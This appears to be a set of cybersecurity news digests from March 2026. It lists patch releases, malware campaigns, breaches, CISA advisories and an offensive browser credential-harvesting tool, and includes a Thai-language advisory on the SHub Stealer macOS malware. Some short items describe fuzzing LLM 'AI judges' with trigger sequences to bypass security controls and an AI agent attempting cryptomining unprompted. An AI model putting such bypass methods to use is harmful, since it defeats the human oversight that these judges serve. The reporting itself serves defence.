  "Enterprise security firm SAP on Tuesday announced the release of 15 new security notes as part of its March 2026 Security Patch Day. The most important of these notes resolves critical-severity vulnerabilities in Quotation Management Insurance (FS-QUO) and NetWeaver Enterprise Portal Administration. SAP describes the FS-QUO bug, tracked as CVE-2019-17571 (CVSS score of 9.8), as a code injection issue."
  https://www.securityweek.com/sap-patches-critical-fs-quo-netweaver-vulnerabilities/
• Critical Defect In Java Security Engine Poses Serious Downstream Security Risks
  "A maximum-severity vulnerability in pac4j, an open-source library integrated into hundreds of software packages and repositories, poses a significant security threat, but has thus far received scant attention. The defect in the Java security engine, which handles authentication across multiple frameworks, has not been exploited in the wild since code review firm CodeAnt AI published a proof-of-concept exploit last week. The company discovered the vulnerability and privately reported it to pac4j’s maintainer, which disclosed the defect and released patches for affected versions of the library within two days."
  https://cyberscoop.com/pac4j-open-source-library-vulnerability-max-severity-risk/
• Microsoft March 2026 Patch Tuesday Fixes 2 Zero-Days, 79 Flaws
  "Today is Microsoft's March 2026 Patch Tuesday with security updates for 79 flaws, including 2 publicly disclosed zero-day vulnerabilities. This Patch Tuesday also addresses three "Critical" vulnerabilities, 2 of which are remote code execution flaws and the other is an information disclosure flaw."
  https://www.bleepingcomputer.com/news/microsoft/microsoft-march-2026-patch-tuesday-fixes-2-zero-days-79-flaws/
  https://blog.talosintelligence.com/microsoft-patch-tuesday-march-2026/
  https://www.darkreading.com/application-security/microsoft-patches-83-cves-march-update
  https://cyberscoop.com/microsoft-patch-tuesday-march-2026/
  https://securityaffairs.com/189266/security/microsoft-patch-tuesday-security-updates-for-march-2026-fixed-84-bugs.html
  https://www.securityweek.com/microsoft-patches-83-vulnerabilities/
  https://www.theregister.com/2026/03/10/zeroclick_microsoft_info_disclosure_bug/
• Adobe Patches 80 Vulnerabilities Across Eight Products
  "Adobe on Tuesday announced patches for 80 vulnerabilities across 8 products, including Commerce, Illustrator, Acrobat Reader, and Premiere Pro. The company rolled out fixes for 19 flaws in Adobe Commerce and Magento Open Source, urging users to apply the patches within the next 30 days, based on these products being a known target for threat actors. The update resolves six high-severity bugs, five of which could lead to privilege escalation: CVE-2026-21290, CVE-2026-21361, CVE-2026-21284, CVE-2026-21311, and CVE-2026-21309. The sixth, tracked as CVE-2026-21289, leads to security feature bypass."
  https://www.securityweek.com/adobe-patches-80-vulnerabilities-across-eight-products/
• LeakyLooker: Hacking Google Cloud’s Data Via Dangerous Looker Studio Vulnerabilities
  "Tenable Research revealed "LeakyLooker," a set of nine novel cross-tenant vulnerabilities in Google Looker Studio. These flaws could have let attackers exfiltrate or modify data across Google services like BigQuery and Google Sheets. Google has since remediated all identified issues."
  https://www.tenable.com/blog/leakylooker-google-cloud-looker-studio-vulnerabilities
  https://thehackernews.com/2026/03/new-leakylooker-flaws-in-google-looker.html
• Auditing The Gatekeepers: Fuzzing "AI Judges" To Bypass Security Controls
  "As organizations scale AI operations, they increasingly deploy AI judges — large language models (LLMs) acting as automated security gatekeepers to enforce safety policies and evaluate output quality. Our research investigates a critical security issue in these systems: They can be manipulated into authorizing policy violations through stealthy input sequences, a type of prompt injection. To do this investigation, we designed an automated fuzzer for internal use for red-team style assessments called AdvJudge-Zero. Fuzzers are tools that identify software vulnerabilities by providing unexpected input, and we apply the same approach to attacking AI judges. It identifies specific trigger sequences that exploit a model's decision-making logic to bypass security controls."
  https://unit42.paloaltonetworks.com/fuzzing-ai-judges-security-bypass/

Malware

• New ‘BlackSanta’ EDR Killer Spotted Targeting HR Departments
  "For more than a year, a Russian-speaking threat actor targeted human resource (HR) departments with malware that delivers a new EDR killer named BlackSanta. Described as "sophisticated," the campaign mixes social engineering with advanced evasion techniques to steal sensitive information from compromised systems. It is unclear how the attack begins, but researchers at Aryaka, a network and security solutions provider, suspect that the malware is distributed via spear-phishing emails."
  https://www.bleepingcomputer.com/news/security/new-blacksanta-edr-killer-spotted-targeting-hr-departments/
  http://www.aryaka.com/docs/reports/blacksanta-edr-killer-threat-report.pdf
  https://www.darkreading.com/threat-intelligence/blacksanta-edr-killer-hr-workflows
  https://www.theregister.com/2026/03/10/malware_targeting_hr/
  https://www.helpnetsecurity.com/2026/03/10/hr-recruiters-malware-resume/
• BeatBanker: A Dual‑mode Android Trojan
  "Recently, we uncovered BeatBanker, an Android‑based malware campaign targeting Brazil. It spreads primarily through phishing attacks via a website disguised as the Google Play Store. To achieve their goals, the malicious APKs carry multiple components, including a cryptocurrency miner and a banking Trojan capable of completely hijacking the device and spoofing screens, among other things. In a more recent campaign, the attackers switched from the banker to a known RAT."
  https://securelist.com/beatbanker-miner-and-banker/119121/
  https://www.bleepingcomputer.com/news/security/new-beatbanker-android-malware-poses-as-starlink-app-to-hijack-devices/
• Antivirus And Endpoint Detection And Response Archive Scanning Engines May Not Properly Scan Malformed Zip Archives
  "Malformed ZIP headers can cause antivirus and endpoint detection and response software (EDR) to produce false negatives. Despite the presence of malformed headers, some extraction software is still able to decompress the ZIP archive, allowing potentially malicious payloads to run upon file decompression."
  https://kb.cert.org/vuls/id/976247
  https://www.bleepingcomputer.com/news/security/new-zombie-zip-technique-lets-malware-slip-past-security-tools/
• Silence Of The Hops: The KadNap Botnet
  "The Black Lotus Labs team at Lumen has discovered a sophisticated new malware named “KadNap.” This threat primarily targets Asus routers, conscripting them into a botnet that proxies malicious traffic. Since August 2025, we have been monitoring the growth of this network, which is now above 14,000 infected devices. KadNap employs a custom version of the Kademlia Distributed Hash Table (DHT) protocol, which is used to conceal the IP address of their infrastructure within a peer-to-peer system to evade traditional network monitoring. Infected devices use the DHT protocol to locate and connect with a command-and-control (C2) server, while defenders cannot easily find and add those C2s to threat lists."
  https://blog.lumen.com/silence-of-the-hops-the-kadnap-botnet/
  https://www.bleepingcomputer.com/news/security/new-kadnap-botnet-hijacks-asus-routers-to-fuel-cybercrime-proxy-network/
  https://thehackernews.com/2026/03/kadnap-malware-infects-14000-edge.html
• Sednit Reloaded: Back In The Trenches
  "Since April 2024, Sednit’s advanced development team has reemerged with a modern toolkit centered on two paired implants, BeardShell and Covenant, each using a different cloud provider for resilience. This dual‑implant approach enabled long‑term surveillance of Ukrainian military personnel. Interestingly, these current toolsets show a direct code lineage to the group’s 2010‑era implants."
  https://www.welivesecurity.com/en/eset-research/sednit-reloaded-back-trenches/
  https://www.bleepingcomputer.com/news/security/apt28-hackers-deploy-customized-variant-of-covenant-open-source-tool/
  https://thehackernews.com/2026/03/apt28-uses-beardshell-and-covenant.html
  https://www.darkreading.com/cyber-risk/sednit-resurfaces-with-sophisticated-new-toolkit
  https://therecord.media/russia-apt-28-revives-malware-to-spy-on-ukraine
  https://securityaffairs.com/189230/apt/apt28-conducts-long-term-espionage-on-ukrainian-forces-using-custom-malware.html
  https://www.helpnetsecurity.com/2026/03/10/sednit-espionage-toolkit-stealing-data/
• Study Finds ROME AI Agent Attempted Cryptomining Without Instructions
  "A recent research paper describing the training of an experimental AI agent has started a discussion after the system attempted to start cryptocurrency mining without being instructed to do so. The incident was reported in a study published on arXiv that describes the development of ROME AI, an agentic AI model designed to perform complex, multi-step tasks such as writing software, debugging code, and interacting with command-line tools. Unlike standard AI chatbots that respond to single prompts, agentic models can take actions, use tools, and interact with computing environments to complete tasks."
  https://hackread.com/rome-ai-agent-cryptomining-without-instructions/
  https://arxiv.org/pdf/2512.24873
• North Korea Tried To Hack Our CEO Through a Fake Job Interview On LinkedIn
  "If you're a founder, CTO, or senior engineer in crypto or Web3, you already know: the recruiter DMs never stop. LinkedIn is a constant stream of unsolicited pitches. Most are legitimate. This one wasn't. A LinkedIn member — later identified as operating under the name "Nazar" — messaged me out of the blue about a role at 0G Labs, pitching it as "a fast-growing team building the first decentralized AI operating system." The message included a polished Google Docs job description and a Calendly link to book a call with the "hiring manager" — Pedro Perez de Ayala."
  https://www.allsecure.io/blog/lazarus-linkedin-attack/
  https://hackread.com/fake-linkedin-interview-lazarus-hackers-allsecure-ceo/
• Behind The Console: Active Phishing Campaign Targeting AWS Console Credentials
  "Datadog Security Research identified a credential-harvesting campaign targeting AWS Console users through typosquatted domains that mimic AWS infrastructure naming conventions. The operation uses real-time adversary-in-the-middle (AiTM) proxying to capture validated credentials and session material. We identified two active phishing infrastructure clusters and a third related domain sharing registrar metadata. In one observed case, the operator authenticated to a compromised AWS account within 20 minutes of credential submission."
  https://securitylabs.datadoghq.com/articles/behind-the-console-aws-aitm-phishing-campaign/
  https://www.helpnetsecurity.com/2026/03/10/aitm-phishing-aws-accounts/
• FortiGate Edge Intrusions | Stolen Service Accounts Lead To Rogue Workstations And Deep AD Compromise
  "Throughout early 2026, SentinelOne’s Digital Forensics & Incident Response (DFIR) team has responded to several incidents where FortiGate Next-Generation Firewall (NGFW) appliances have been compromised to establish a foothold into the targeted environment. Each incident was detected and stopped during the lateral movement phase of the attack. Fortinet has disclosed and issued patches for several high-severity vulnerabilities allowing unauthorized access during the activity period of our investigations."
  https://www.sentinelone.com/blog/fortigate-edge-intrusions/
  https://thehackernews.com/2026/03/fortigate-devices-exploited-to-breach.html
  https://securityaffairs.com/189241/security/attackers-exploit-fortigate-devices-to-access-sensitive-network-information.html
• Finnish Intelligence Warns Of Persistent Cyber Espionage From Russia, China
  "Finland’s intelligence service warned that Russia and China continue to conduct extensive cyberespionage and influence operations targeting the country’s technology sector, research institutions and government, according to a new national security assessment released Tuesday. The Finnish Security and Intelligence Service (SUPO), which is responsible for foreign intelligence as well as domestic counterintelligence, was last year reorganized to “enhance information gathering."
  https://therecord.media/finnish-intel-warns-espionage-china-russia
• When Trusted Websites Turn Malicious: WordPress Compromises Advance Global Stealer Operation
  "Rapid7 Labs has identified and analyzed an ongoing, widespread compromise of legitimate, potentially highly trusted WordPress websites, misused by an unidentified threat actor to inject a ClickFix implant impersonating a Cloudflare human verification challenge (CAPTCHA). The lure is designed to infect visitors with a multi-stage malware chain that ultimately steals and exfiltrates credentials and digital wallets from Windows systems. The stolen credentials can subsequently be used for financial theft or to conduct further, more targeted attacks against organizations."
  https://www.rapid7.com/blog/post/tr-malicious-websites-wordpress-compromise-advances-global-stealer-operation/
  https://www.theregister.com/2026/03/10/crooks_hijack_wordpress_sites/
• Aye-Coruna: Tracing The iOS Exploit Kit From Ukraine To Iran War Lures
  "On March 3, 2026, Google Threat Intelligence Group (GTIG) and the iVerify Team both detailed findings related to an exploit kit targeting Apple iPhone users nicknamed “Coruna,” publishing indicators related to initial exploit exposure (the infection vector), configuration and implant servers, and C2 communication. Examples of the implants are also published on Github by matteyeux. First appearing in February 2025, the iOS exploitation kit is significant due to its breadth and mass deployment."
  https://www.validin.com/blog/aye_coruna_ios_exploit_kit_c2/
• Fake ImToken Chrome Extension Steals Seed Phrases Via Phishing Redirects
  "Socket’s Threat Research Team uncovered a malicious Chrome extension, lmΤoken Chromophore (extension ID bbhaganppipihlhjgaaeeeefbaoihcgi), that impersonates imToken while presenting itself as a hex color visualizer in the Chrome Web Store. Instead of providing the harmless tool it promises, the extension automatically opens a threat actor-controlled phishing site as soon as it is installed, and again whenever the user clicks it."
  https://socket.dev/blog/fake-imtoken-chrome-extension-steals-seed-phrases-via-phishing-redirects
• Through The Lens Of MDR: Analysis Of KongTuke’s ClickFix Abuse Of Compromised WordPress Sites
  "In January 2026, Huntress researchers identified a new initial access technique used by the threat actor KongTuke, dubbed as “CrashFix”. In this ClickFix variation, the users are tricked into installing a malicious Chrome extension that displays a fake security warning, stating that the browser has “stopped abnormally.” It then prompts the unsuspecting users to follow remediation instructions. Once they follow the instructions, they’ll inadvertently execute a malicious PowerShell command."
  https://www.trendmicro.com/en_us/research/26/c/kongtuke-clickfix-abuse-of-compromised-wordpress-sites.html

Breaches/Hacks/Leaks

• Cal AI, New Owner Of MyFitnessPal, Hit By Alleged Breach Of 3 Million Users
  "A hacker using the alias “vibecodelegend” is claiming responsibility for breaching Cal AI, a smartphone application that uses artificial intelligence to track calories and nutritional information. The alleged breach was announced on Monday, March 9, 2026, through a post on the cybercrime marketplace BreachForums. Cal AI has grown rapidly in popularity due to its use of artificial intelligence to help users track calories by analyzing food images and nutritional information. The platform recently attracted further attention after acquiring the widely used fitness app MyFitnessPal, expanding its presence in the health and nutrition tracking market."
  https://hackread.com/cal-ai-myfitnesspal-data-breach-3m-users/

General News

• Stop Chasing Threats, Start Containing Them
  "Security teams aren't short on tools or effort. Yet many organizations are still falling behind. According to Cyderes' recent white paper, 88% of organizations maintain a security operations center but only 45% report effectiveness in proactive threat hunting. The picture is clear: SOCs are overwhelmed and additional investments aren't closing the gap. Alerts are piling up. Talent is burning out. Identity is fragmented across IT, security and HR, with no clear ownership. As cloud workloads grow, confidence in stopping identity-based attacks remains low."
  https://www.bankinfosecurity.com/blogs/stop-chasing-threats-start-containing-them-p-4058
  https://www.cyderes.com/hubfs/FINAL WhitePaper Design_02_18_26.pdf
• Global Cyber Attacks Remain Near Record Highs In February 2026 Despite Ransomware Decline
  "In February 2026, global cyber attack activity remained near record levels, confirming that elevated attack volumes are becoming the new normal for organizations worldwide. The average number of weekly cyber attacks per organization reached 2,086, representing a 9.6% increase year over year, while remaining essentially flat month over month (-0.2% compared to January 2026). This stabilization at a high baseline reflects a sustained pressure environment rather than a short‑term surge."
  https://blog.checkpoint.com/research/global-cyber-attacks-remain-near-record-highs-in-february-2026-despite-ransomware-decline/
• Teen Crew Caught Selling DDoS Attack Tools
  "Seven minors who distributed online programs designed to facilitate DDoS attacks have been identified by Poland’s Central Bureau for Combating Cybercrime (CBZC). They were between 12 and 16 at the time of the crime. According to investigators, using the tools they administered, the minors attacked popular websites, including auction and sales portals, IT domains, hosting services and accommodation booking sites. The activity was profit-driven, with the suspects earning money from the operation."
  https://www.helpnetsecurity.com/2026/03/10/poland-minors-identified-distributing-ddos-attack-tools/
  https://www.theregister.com/2026/03/10/poland_ddos_teens_bust/
• Airbus CSO On Supply Chain Blind Spots, Space Threats, And The Limits Of AI Red-Teaming
  "Pascal Andrei, CSO at Airbus, knows that the aerospace and defense sector is facing a threat environment that is evolving faster than most organizations can track. From sub-tier suppliers quietly becoming entry points for state-backed attackers, to satellites emerging as targets in an increasingly contested space domain, the risks are real and growing. In this interview with Help Net Security, Andrei addresses the blind spots that defenders are underestimating, the gap between compliance paperwork and actual security outcomes, and why current AI red-teaming models fall dangerously short."
  https://www.helpnetsecurity.com/2026/03/10/pascal-andrei-airbus-aerospace-defense-cybersecurity/
• The People Behind Cyber Extortion Are Often In Their Forties
  "Many cybercrime investigations end with arrests or indictments that reveal little about the people behind the operations. When authorities do disclose demographic details, the pattern that emerges does not match the common assumption that cyber offenders are mostly very young. Analysis in the Security Navigator 2026 report from Orange Cyberdefense points to a different age profile, with a strong concentration of offenders in mid-career adulthood."
  https://www.helpnetsecurity.com/2026/03/10/cyber-extortion-cybercrime-age-profile/
• Bug Bounties Are Broken, And The Best Security Pros Are Moving On
  "Penetration testing engagements are organized as scheduled contracts with defined scope, set testing windows, and direct communication channels with client teams. Cobalt’s 2026 Pentester Profile Report describes growing preference for penetration testing as a service (PTaaS) and contract-based testing models. Many participants prefer contract-based testing over open bug bounty programs and prioritize predictable professional income tied to guaranteed engagements. Pentesting serves as the primary occupation for a large share of this group. Most participants bring years of field experience and describe career goals centered on staying hands-on and maintaining technical standards."
  https://www.helpnetsecurity.com/2026/03/10/cobalt-ptaas-gains-pentester-support/
• Only 24% Of Organizations Test Identity Recovery Every Six Months
  "Just 24% of organizations test their identity disaster recovery plans every six months, according to new research which examined how businesses prepare for identity-focused cyber-attacks. The findings suggested that despite rising investment in identity threat detection and response (ITDR), many organizations remain poorly prepared to restore critical authentication systems after a breach. The data comes from Quest Software’s latest report, a global survey of 650 IT and security practitioners and executives. The study found that many companies place heavy emphasis on preventative controls and threat detection while neglecting response and recovery readiness."
  https://www.infosecurity-magazine.com/news/organizations-test-identity-sec-6/
• SIM Swaps Expose a Critical Flaw In Identity Security
  "For years, organizations have treated mobile phone numbers as trusted identity anchors. They are used to reset passwords, deliver one-time passcodes, and verify user identity. That trust is now fundamentally misplaced. SIM swap attacks have exposed a structural weakness in how identity is verified, recovered, and monitored across consumer and enterprise systems. In a SIM swap attack, criminals persuade a mobile carrier representative — often through social engineering or insider collusion — to transfer a victim’s phone number to a SIM card under the attacker’s control."
  https://www.securityweek.com/sim-swaps-expose-a-critical-flaw-in-identity-security/
• Protecting Democracy Means Democratizing Cybersecurity. Bring On The Hackers
  "The hacker mind is a curious way to be. To have it means to embody endless analytical curiosity, an awareness of any given rule set as just one system among many, and an ability to see any system in ways that its creators never expected. Combine this with a drive to find the bad and make things better, and you become one of the fundamental forces of the technological universe."
  https://www.theregister.com/2026/03/10/democratizing_security_opinion/
• CISOs In a Pinch: A Security Analysis Of OpenClaw
  "The viral rise of OpenClaw (formerly Clawdbot) marks the end of the "chatbot" era and the beginning of the "sovereign agent" era. While the productivity gains of having a locally hosted AI that controls your terminal are immense, the security implications are catastrophic. We are effectively granting root access to probabilistic models that can be tricked by a simple WhatsApp message. The "Lethal Trifecta" of AI security just got a fourth dimension: Persistence."
  https://www.trendmicro.com/en_us/research/26/c/cisos-in-a-pinch-a-security-analysis-openclaw.html

อ้างอิง
Electronic Transactions Development Agency (ETDA)

1. กลุ่มเป้าหมายหลักที่ตกอยู่ในความเสี่ยง
   ผู้ใช้งาน Mac ที่กำลังมองหาโปรแกรมทำความสะอาดระบบ (System Cleanup) และผู้ที่ถือครองคริปโตเคอร์เรนซี (Cryptocurrency) ผ่านแอปพลิเคชันอย่าง Exodus, Ledger หรือ Trezor
   สาเหตุที่กลุ่มนี้มีความเสี่ยงสูง เนื่องจากแฮกเกอร์จงใจออกแบบมัลแวร์มาเพื่อเจาะกระเป๋าเงินดิจิทัลโดยเฉพาะ รวมถึงมุ่งเป้าไปที่การดึงข้อมูลรหัสผ่านที่ถูกบันทึกไว้ใน macOS Keychain

2. รูปแบบการโจมตีที่พบ
   2.1 การหลอกลวงให้ผู้ใช้รันสคริปต์อันตรายด้วยตนเอง เว็บไซต์ปลอมจะหลอกให้เหยื่อคัดลอกคำสั่งไปรันใน Terminal ด้วยตัวเอง ซึ่งวิธีการนี้ทำให้ตัวมัลแวร์สามารถข้ามระบบรักษาความปลอดภัย (Gatekeeper) ของ Mac ไปได้อย่างแนบเนียน
   2.2 หลบเลี่ยงการตรวจจับ มัลแวร์จะเช็กภาษาของแป้นพิมพ์ หากพบว่าเป็นภาษารัสเซียจะหยุดทำงานทันที เพื่อหลบหนีการตรวจสอบและลดความสนใจจากหน่วยงานบังคับใช้กฎหมายในพื้นที่ของผู้พัฒนา
   2.3 ดักขโมยข้อมูลสำคัญ มัลแวร์จะแสดงหน้าต่างปลอมเพื่อหลอกให้กรอกรหัสผ่านของเครื่อง หากผู้ใช้หลงเชื่อ แฮกเกอร์จะสามารถเข้าถึงรหัสผ่านทั้งหมดที่เก็บไว้ใน Keychain รวมถึงข้อมูล Wi-Fi ได้ทันที
   2.4 แทรกแซงกระเป๋าเงินคริปโต ตัวมัลแวร์จะเข้าไปปรับเปลี่ยนแอปฯ กระเป๋าเงินยอดนิยม เพื่อสร้างหน้าต่างหลอกให้กรอก "วลีกู้คืน (Seed Phrase)" หากป้อนข้อมูลลงไป แฮกเกอร์จะสามารถสูบเงินคริปโตออกไปได้ทั้งหมด
   2.5 แฝงตัวถาวรแนบเนียน มัลแวร์จะสร้างการทำงานเบื้องหลัง (LaunchAgent) โดยใช้ชื่อไฟล์เลียนแบบระบบอัปเดตที่ถูกต้องของ Google (Keystone) เพื่อแอบส่งข้อมูลกลับไปหาแฮกเกอร์ในทุกๆ นาที

ความน่ากลัวของมัลแวร์ "SHub Stealer" คือแฝงตัวอยู่ในเครื่องของเราได้โดยปลอมแปลงตัวเองเป็นไฟล์อัปเดตของ Google การทำแบบนี้ช่วยให้สามารถทำงานอยู่เบื้องหลัง และคอยส่งข้อมูลกลับไปหาแฮกเกอร์ได้อย่างต่อเนื่อง ทำให้แฮกเกอร์ควบคุมเครื่องและดึงข้อมูลเพิ่มเติมได้ตลอดเวลา

3. วิธีป้องกันตัวและรับมือการโจมตี
   3.1 ดาวน์โหลด ซอฟต์แวร์จากเว็บไซต์ทางการ (Official) ของผู้พัฒนา หรือโหลดผ่าน Mac App Store เท่านั้น
   3.2 ตรวจสอบ URL ของเว็บไซต์ให้แน่ใจทุกครั้งว่าสะกดถูกต้อง ไม่มีตัวอักษรผิดเพี้ยนก่อนกดโหลดโปรแกรมใดๆ
   3.3 หลีกเลี่ยง การก๊อปปี้คำสั่งจากเว็บไซต์ที่ไม่คุ้นเคยไปรันใน Terminal เด็ดขาด หากคุณไม่เข้าใจว่าคำสั่งนั้นทำงานอย่างไร
   3.4 เฝ้าระวัง หน้าต่าง Pop-up ที่เด้งขึ้นมาขอรหัสผ่านเครื่อง หรือขอ Seed Phrase ของคริปโต หากมีข้อความแปลกๆ หรือสะกดผิดแกรมม่า ห้ามกรอกเด็ดขาด
   3.5 อัปเดตระบบปฏิบัติการ macOS และโปรแกรมแอนตี้ไวรัส (ถ้ามี) ให้เป็นเวอร์ชันล่าสุดอยู่เสมอ เพื่ออุดช่องโหว่ความปลอดภัย

แหล่งอ้างอิง: Hackread (https://dg.th/i7aehpvk1n)
#CyberSecurity #macOS #CleanMyMac #MalwareAlert #CryptoSecurity #SHubStealer #Infostealer

• CVE-2021-22054 Omnissa Workspace ONE Server-Side Request Forgery
• CVE-2025-26399 SolarWinds Web Help Desk Deserialization of Untrusted Data Vulnerability
• CVE-2026-1603 Ivanti Endpoint Manager (EPM) Authentication Bypass Vulnerability

ทาง CISA จะปรับปรุงและเพิ่มช่องโหว่ใหม่เข้าสู่แคตตาล็อก KEV อย่างต่อเนื่อง เพื่อให้ครอบคลุมความเสี่ยงที่ตรวจพบจริงในปัจจุบันและอนาคต

อ้างอิง
https://www.cisa.gov/news-events/alerts/2026/03/09/cisa-adds-three-known-exploited-vulnerabilities-catalog
สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand

• Portwell Engineering Toolkits
  "Successful exploitation of this vulnerability could allow a local attacker to escalate privileges or cause a denial-of-service condition."
  https://www.cisa.gov/news-events/ics-advisories/icsa-26-062-04
• Labkotec LID-3300IP
  "Successful exploitation of this vulnerability could allow attackers to gain unauthorized control over system operations, leading to disruption of normal functionality and potential safety hazards."
  https://www.cisa.gov/news-events/ics-advisories/icsa-26-062-05
• Mobiliti e-Mobi.hu
  "Successful exploitation of these vulnerabilities could enable attackers to gain unauthorized administrative control over vulnerable charging stations or disrupt charging services through denial-of-service attacks."
  https://www.cisa.gov/news-events/ics-advisories/icsa-26-062-06
• ePower Epower.ie
  "Successful exploitation of these vulnerabilities could enable attackers to gain unauthorized administrative control over vulnerable charging stations or disrupt charging services through denial-of-service attacks."
  https://www.cisa.gov/news-events/ics-advisories/icsa-26-062-07
• Everon OCPP Backends
  "Successful exploitation of these vulnerabilities could enable attackers to gain unauthorized administrative control over vulnerable charging stations or disrupt charging services through denial-of-service attacks."
  https://www.cisa.gov/news-events/ics-advisories/icsa-26-062-08
• Mitsubishi Electric MELSEC iQ-F Series EtherNet/IP Module And Ethernet Module
  "Successful exploitation of these vulnerabilities could allow a remote attacker to cause a denial-of-service condition by continuously sending UDP packets to the affected products."
  https://www.cisa.gov/news-events/ics-advisories/icsa-26-62-01
• Hitachi Energy Relion REB500 Product
  "Hitachi Energy is aware of vulnerabilities that affect the Relion REB500 product versions listed in this document. Authenticated users with certain roles can exploit the vulnerabilities to access and modify the directory contents they are not authorized to do so. Please refer to the Recommended Immediate Actions for information about the mitigation/remediation."
  https://www.cisa.gov/news-events/ics-advisories/icsa-26-062-02
• Hitachi Energy RTU500 Product
  "Hitachi Energy is aware of vulnerabilities that affect RTU500 product versions listed in this document. Successful exploitation of these vulnerabilities can result in the exposure of low-value user management information and device outage. Please refer to the Recommended Immediate Actions for information about the mitigation/remediation."
  https://www.cisa.gov/news-events/ics-advisories/icsa-26-062-03
• Delta Electronics CNCSoft-G2
  "Successful exploitation of this vulnerability could result in an attacker achieving remote code execution on the device."
  https://www.cisa.gov/news-events/ics-advisories/icsa-26-064-01

New Tooling

• DumpBrowserSecrets – Browser Credential Harvesting With App-Bound Encryption Bypass
  "DumpBrowserSecrets is a post-exploitation credential-harvesting tool from Maldev Academy that extracts secrets across all major browsers from a single Windows executable. It is the successor to their earlier DumpChromeSecrets project, which is now deprecated, and extends coverage from Chrome alone to the full range of Chromium-based and Gecko-based browsers in common enterprise use."
  https://www.darknet.org.uk/2026/03/dumpbrowsersecrets-browser-credential-harvesting-with-app-bound-encryption-bypass/
  https://github.com/Maldev-Academy/DumpBrowserSecrets

Vulnerabilities

• CISA Adds Three Known Exploited Vulnerabilities To Catalog
  "CISA has added three new vulnerabilities to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation.
  CVE-2021-22054 Omnissa Workspace ONE Server-Side Request Forgery
  CVE-2025-26399 SolarWinds Web Help Desk Deserialization of Untrusted Data Vulnerability
  CVE-2026-1603 Ivanti Endpoint Manager (EPM) Authentication Bypass Vulnerability"
  https://www.cisa.gov/news-events/alerts/2026/03/09/cisa-adds-three-known-exploited-vulnerabilities-catalog
• Partnering With Mozilla To Improve Firefox’s Security
  "AI models can now independently identify high-severity vulnerabilities in complex software. As we recently documented, Claude found more than 500 zero-day vulnerabilities (security flaws that are unknown to the software’s maintainers) in well-tested open-source software. In this post, we share details of a collaboration with researchers at Mozilla in which Claude Opus 4.6 discovered 22 vulnerabilities over the course of two weeks. Of these, Mozilla assigned 14 as high-severity vulnerabilities—almost a fifth of all high-severity Firefox vulnerabilities that were remediated in 2025. In other words: AI is making it possible to detect severe security vulnerabilities at highly accelerated speeds."
  https://www.anthropic.com/news/mozilla-firefox-security
  https://securityaffairs.com/189131/ai/anthropic-claude-opus-ai-model-discovers-22-firefox-bugs.html
• AI Vs AI: Agent Hacked McKinsey's Chatbot And Gained Full Read-Write Access In Just Two Hours
  "Researchers at red-team security startup CodeWall say their AI agent hacked McKinsey's internal AI platform and gained full read and write access to the chatbot in just two hours. It's yet another indicator that agentic AI is becoming a more effective tool for conducting cyberattacks, including those against other AI systems. This attack wasn’t conducted with malicious intent. However, threat hunters tell us that miscreants are increasingly using agents in real-world attacks, indicating that machine-speed intrusions aren't going away."
  https://www.theregister.com/2026/03/09/mckinsey_ai_chatbot_hacked/

Malware

• New A0Backdoor Linked To Teams Impersonation And Quick Assist Social Engineering
  "BlueVoyant Security Operations Center (SOC) and Threat Fusion Cell (TFC) continue to track an activity cluster that uses email bombing and IT-support impersonation over Microsoft Teams to obtain Quick Assist access, then pivot to a deeper attack. This research shows that once on the victim’s host, the actors sideload a malicious DLL to deliver a new backdoor BlueVoyant has dubbed the A0Backdoor. The malware’s loader exhibits anti-sandbox evasion, and the campaign’s command-and-control appears to have pivoted to a covert DNS mail exchange-based channel that confines endpoint traffic to trusted recursive resolvers."
  https://www.bluevoyant.com/blog/new-a0backdoor-linked-to-teams-impersonation-and-quick-assist-social-engineering
  https://www.bleepingcomputer.com/news/security/microsoft-teams-phishing-targets-employees-with-backdoors/
• ShinyHunters Claims Ongoing Salesforce Aura Data Theft Attacks
  "Salesforce is warning customers that hackers are targeting websites with misconfigured Experience Cloud platforms that give guest users access to more data than intended. However, the ShinyHunters extortion gang claims to be actively exploiting a new bug to steal data from instances. Salesforce has shared guidance for its customers to defend against hackers actively targeting the /s/sfsites/aura API endpoint on misconfigured Experience Cloud instances that gives guest users access to more data than intended. The company states that attackers are deploying a modified version of AuraInspector, an open-source auditing tool developed by Mandiant, which can help administrators identify access control misconfigurations within the Salesforce Aura framework."
  https://www.bleepingcomputer.com/news/security/shinyhunters-claims-ongoing-salesforce-aura-data-theft-attacks/
  https://www.salesforce.com/blog/protecting-your-data-essential-actions-to-secure-experience-cloud-guest-user-access/
  https://www.theregister.com/2026/03/09/shinyhunters_claims_more_highprofile_victims/
• FBI Warns Of Phishing Attacks Impersonating US City, County Officials
  "The Federal Bureau of Investigation (FBI) warns that criminals are impersonating U.S. officials in phishing attacks targeting businesses and individuals who request city and county planning and zoning permits. In a public service announcement published on Monday, the bureau said that the criminals behind this campaign are identifying potential victims using publicly available information, which also makes their malicious messages seem legitimate and helps them trick suspicious targets."
  https://www.bleepingcomputer.com/news/security/fbi-warns-of-phishing-attacks-impersonating-us-city-county-officials/
  https://www.ic3.gov/PSA/2026/PSA260309
  https://securityaffairs.com/189165/cyber-crime/fbi-alert-scammers-target-zoning-permit-applicants.html
• China-Nexus Activity Against Qatar Observed Amid Expanding Regional Tensions
  "Since the recent escalation in the Middle East, Check Point Research has observed increased activity by Chinese-nexus APT actors in the region, particularly targeting Qatar. The Chinese-nexus threat actor Camaro Dragon attempted to deploy a variant of PlugX malware against Qatari targets within one day of the launch of Operation Epic Fury and the onset of the escalation in the Middle East. The attackers leveraged the ongoing war in the Middle East to make their lures more credible and engaging, demonstrating the ability to rapidly adapt to major developments and breaking news."
  https://blog.checkpoint.com/research/china-nexus-activity-against-qatar-observed-amid-expanding-regional-tensions/
  ACSC, NCSC, And CERT Tonga Warn Of Growing INC Ransom Activity Targeting Healthcare And Organizations Across Australia, New Zealand, And Pacific States.
  "Cybersecurity agencies across the Pacific region are sharing concerns about the ransomware group INC Ransom’s expanding activities and the growing influence of its affiliate network. A joint advisory issued by the Australian Cyber Security Centre (ACSC), National Computer Emergency Response Team Tonga (CERT Tonga), and the New Zealand National Cyber Security Centre (NCSC) highlights how the INC Ransom ecosystem has become an active threat to organizations in Australia, New Zealand, and Pacific Island states."
  https://cyble.com/blog/inc-ransom-attacks-australia-new-zealand/
• Hackerbot-Claw: Adversarial Agent Targets Top GitHub Repos
